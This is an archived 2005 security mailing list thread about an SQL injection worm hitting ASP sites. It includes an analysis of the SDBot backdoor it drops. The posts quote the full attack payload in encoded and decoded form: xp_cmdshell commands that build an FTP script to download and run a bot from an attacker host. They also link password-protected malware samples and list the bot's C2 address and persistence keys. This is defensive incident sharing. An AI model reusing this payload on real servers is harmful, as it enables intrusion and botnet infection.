Full Disclosure mailing list archives
FW: Re: [Dshield] SQL injection worm ?
From: "Tim Myers" <tmyers () coactivesys com>
Date: Wed, 19 Jan 2005 16:24:58 -0500
Maxime, Here is the information I've gathered on lol.exe. Hope this helps you out or anyone else that has this worm. Let me know if you need anything else. Tim Myers FILE INFORMATION: The file consists of SDBot which is a Win32 Backdoor. Packed/Encrypted with Morphine 1.2 The trojan connects to IRC Server - 170.211.69.66:6667 Where it will wait for commands. Drops msgfix.exe into the \windows\system32 directory and adds itself to startup via HKLM\..\..\run IP INFORMATION: [170.211.69.66] OrgName: Arkansas Public School Computer Network OrgID: APSCN Address: #4 State Capitol Mall, Room 401A City: Little Rock StateProv: AR PostalCode: 72201-1071 Country: US NetRange: 170.211.0.0 - 170.211.255.255 CIDR: 170.211.0.0/16 NetName: APSCN-1 NetHandle: NET-170-211-0-0-1 Parent: NET-170-0-0-0-0 NetType: Direct Assignment NameServer: DNS3.STATE.AR.US NameServer: DNS1.STATE.AR.US Comment: RegDate: 1995-01-30 Updated: 2000-02-08 TechHandle: ZS25-ARIN TechName: State of Arkansas TechPhone: +1-501-682-0500 TechEmail: hostmaster () dcs state ar us SDBOT INFORMATION: Backdoor.Sdbot is a server component (bot) that the Trojan's creator distributes over IRC channels. This Trojan horse allows its creator to perform a wide variety of actions on a compromised computer. The Trojan arrives in the form of a Portable Executable (PE) file. When Backdoor.Sdbot is executed, it does the following: Copies itself to the %System% folder. The file name to which it copies itself can vary. Some known file names are: Cnfgldr.exe cthelp.exe Sysmon16.exe Sys3f2.exe Syscfg32.exe Mssql.exe Aim95.exe Svchosts.exe FB_PNU.EXE Cmd32.exe Sys32.exe Explorer.exe IEXPL0RE.EXE iexplore.exe sock32.exe MSTasks.exe service.exe Regrun.exe ipcl32.exe syswin32.exe CMagesta.exe YahooMsgr.exe vcvw.exe spooler.exe MSsrvs32.exe svhost.exe winupdate32.exe quicktimeprom.exe NOTE: %System% is a variable. The Trojan locates the \Windows\System folder (by default, this is C:\Windows\System or C:\Winnt\System32), and then copies itself to that location. Adds one of the following values: "Configuration Manager"="Cnfgldr.exe" "System Monitor"="Sysmon16.exe" "MSSQL"="Mssql.exe" "Configuration Loader" = "aim95.exe" "Internet Config" = "svchosts.exe" "System33" = "%System%\FB_PNU.EXE" "Configuration Loader"="cmd32.exe" "Windows Explorer"="Explorer.exe" "Configuration Loader"="IEXPL0RE.EXE" "Configuration Loader"="%System%\iexplore.exe" "Sock32"="sock32.exe" "Configuration Loader"="MSTasks.exe" "Windows Services"="service.exe" "Registry Checker" = "%System%\Regrun.exe" "Internet Protocol Configuration Loader" = "ipcl32.exe "syswin32" = "syswin32.exe" "MachineTest" = "CMagesta.exe" "Yahoo Instant Messenger" = "Yahoo Instant Messenger" "Fixnice" = "vcvw.exe" "Windows Configuration" = "spooler.exe" "Microsoft Video Capture Controls" = "MSsrvs32.exe" "Microsoft Synchronization Manager" = "svhost.exe" "Microsoft Synchronization Manager" = "winupdate32.exe" "Quick Time file manager" = "quicktimeprom.exe" "cthelp"="cthelp.exe" or a similar value to the following registry keys: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ RunServices HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Backdoor.Sdbot contains its own IRC client, allowing it to connect to an IRC channel that was coded into the Trojan. Using the IRC channel, the Trojan listens for the commands from the Trojan's creator. The creator of the Trojan accesses the Trojan by using a password-protected authorization. The commands allow the Trojan's creator to perform any of the following actions: Manage the Backdoor installation. Control the IRC client on a compromised computer. Dynamically update the installed Trojan. Send the Trojan to other IRC channels to attempt to compromise more computers. Download and execute files. Deliver system and network information to the Trojan's creator. Perform Denial of Service (DoS) attacks against a target, which the Trojan's creator defines. Completely uninstall itself by removing the relevant registry entries. -----Original Message----- From: full-disclosure-bounces () lists netsys com [mailto:full-disclosure-bounces () lists netsys com] On Behalf Of Maxime Ducharme Sent: Wednesday, January 19, 2005 2:13 PM To: full-disclosure () lists netsys com; General DShield Discussion List; incidents () securityfocus com Subject: [Full-disclosure] Re: [Dshield] SQL injection worm ? Hi to the List today we received the same SQL injection attack on the same URL : IP : 24.1.139.29 (c-24-1-139-29.client.comcast.net) User Agent : none sent HTTP Verb : GET /theasppage.asp?anID= Attack : 377';exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\'; exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo USER chadicka r0ckpaul >> %systemroot%\system32\macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\system32\macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'-- The lol.exe file can be found in this archive for inspection : http://www.cybergeneration.com/security/2005.01.19/lol.zip zip pass is das978tewa234 Norton with definitions of 12 jan. doesnt find anything suspicious. I'm interested if someone do an analysis on this file. Have a nice day Maxime Ducharme Programmeur / Spécialiste en sécurité réseau ----- Original Message ----- From: "Maxime Ducharme" <mducharme () cybergeneration com> To: <full-disclosure () lists netsys com>; "General DShield Discussion List" <list () lists dshield org>; <incidents () securityfocus com> Sent: Wednesday, January 05, 2005 12:22 PM Subject: [Dshield] SQL injection worm ?
Hi list, we receveid a particular SQL injection attack on one of our site. Attack looks like : 2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp
id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68
%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7
8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op
en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%
5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%
68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%
5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..
%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2
5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C
system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7
8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5
Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%
78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo
t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45
%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%
5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6
3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car
cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin
e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 attacked.web.site.com - - - HTTP request contains only 2 fields (beside HTTP method) : Connection: Keep-Alive Host: attacked.web.site.com (I obviously replaced the name of the site). Decoded SQL injection looks like : exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\'; exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >> %systemroot%\system32\macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo get rBot.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'del
%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe y.y.y.y is a foreign IP in Europe which host FTP an WWW server. I sent a notice this this site sysadmin about the situation. I have been able to connect to this FTP with the account hahajk/hahaowned (which do not seem legit to me ...) and download suspicious files. I mirrored them here : http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip zip pass is 968goyw439807r3qw 24.164.202.24 is on rr.com networks, they have also been advised. I know rbot.exe is known to be Randex worm, but i'd like that have some other results / analysis. I also found a "test.asp" file which contains the Spybot worm. Weird thing is, I searched for this hosts's activity on every server and every firewall we run, and I only see 1 TCP connection which is the prepared SQL injections attack, nothing else. Anybody see similar activity ? I'm asking since I want to know if we are targeted by someone of by a worm like Santy of use search engines to find vulnerable ASP scripts. Thanks in advance Happy new year to everyone ! Maxime Ducharme Programmeur / Spécialiste en sécurité réseau -------------- Sponsor Message ------------------------------------ SANS Intrusion Immersion Training: Orlando, FL, February 3-9th http://www.sans.org/orlando05 _______________________________________________ send all posts to list () lists dshield org To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- FW: Re: [Dshield] SQL injection worm ? Tim Myers (Jan 19)